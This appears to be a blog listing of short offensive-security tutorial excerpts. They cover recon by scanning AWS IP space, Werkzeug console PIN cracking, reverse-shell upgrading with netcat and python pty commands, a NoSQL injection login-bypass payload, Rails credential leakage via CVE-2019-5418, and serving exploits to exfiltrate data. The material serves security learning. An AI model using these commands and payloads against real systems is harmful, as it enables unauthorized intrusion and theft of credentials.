How To Scan AWS's Entire IP Range to Recon SSL Certificates

Naffy (nnwakelam) shared in his recent nahamsec interview a creative approach to extend a target’s attack surface. Scan Amazon AWS’s entire IPv4 network space, and match the SSL certificates back to hostnames of your target. Many companies and governments, rather than spinning up assets on their assigned IP blocks (ASNs), increasingly rely on cloud services like Amazon AWS and Microsoft Azure to host their production and development assets. With public cloud infrastructure fast becoming the norm, your reconnaissance will miss out on many assets just by scanning an organization’s private network ranges using tools like Nmap or Shodan.

OneForAll, A Powerful Chinese Subdomain Enumeration Tool

OneForAll is a Chinese recon tool for enumerating subdomains. Chances are you already use OWASP Amass as your primary subdomain enumeration tool; but unlike other instances of tool overlap, OneForAll is a practical supplement to provide an extra edge due to its Chinese context. OneForAll pulls from a multitude of exotic Chinese data sources that other tools typically do not query — FOFA, Baidu Cloud Observation, Gitee, and ChinaZ Alexa, to name a few in its vast collection.

Werkzeug Console PIN Exploit

See Werkzeug “console locked” message by forcing debug error page in the app. The console is locked and needs to be unlocked by entering the PIN. You can find the PIN printed out on the standard output of your shell that runs the server Locate vulernable Werkzeug debug console at path vulnerable-site.com/console, but is locked by secret PIN number. You can reverse the algorithm generating the console PIN. Inspect Werkzeug’s debug __init__.

Upgrade Default Reverse Shell to Fully Interactive Shell

After reverse shell with netcat listener (e.g. nc -lvp 6969), by default the “dumb shell” is non-interactive and cannot pass special keyboard commands such as tab autocomplete, backspace, arrow keys, etc. To upgrade dumb shell to fully interactive shell, run this python command to get partially interactive shell: python -c 'import pty;pty.spawn("/bin/bash");' <Ctrl-z> in terminal to background netcat. Now with the shell backgrounded, change terminal line settings to type raw and tell it to pass keyboard shortcuts:

Bruteforce MongoDB Credentials with Regex Match Payload

If a login form is vulnerable to NoSQL injection attack, try bypassing authentication with a payload such as: username[$ne]=foo&password[$ne]=foo But explicit login credentials may be required for deeper system access. When this injection vulnerability exists, a regex matching payload could also enumerate the full plaintext password. Here is a Go script to bruteforce admin credentials on a login form that uses MongoDB as a backend. In this example, the script assumes unique HTTP response code of 302 when password regex is matched.

Expose & Decrypt Ruby on Rails credentials.yml.enc

Ruby on Rails is vulnerable to critical information disclosure using the “Accept” header technique (CVE-2019-5418). This can leak the rails app’s secret credentials via directory traversal. Expose master key and encrypted credentials First find a path in the Rails app that uses the render file method. Typically a 404 page implements this to render the view. Read more about the root cause of this vulnerability from chybeta. Using Burp Suite Repeater or curl request, test vulnerabilty by setting header value to Accept: .

Serving PoC Exploits with an HTTP Attack Server

Quickly serve your exploit files with Node.js-based http-server by http-party. After testing several different http server scripts, this one fits my use case the best. It’s easy to deploy (no installation), activitely maintained on github, and provides live verbose logging of incoming requests. The logging is useful especially when you need to exfiltrate data from the victim. How to deploy On your machine/VPS, cd into the directory containing the file(s) you want to serve.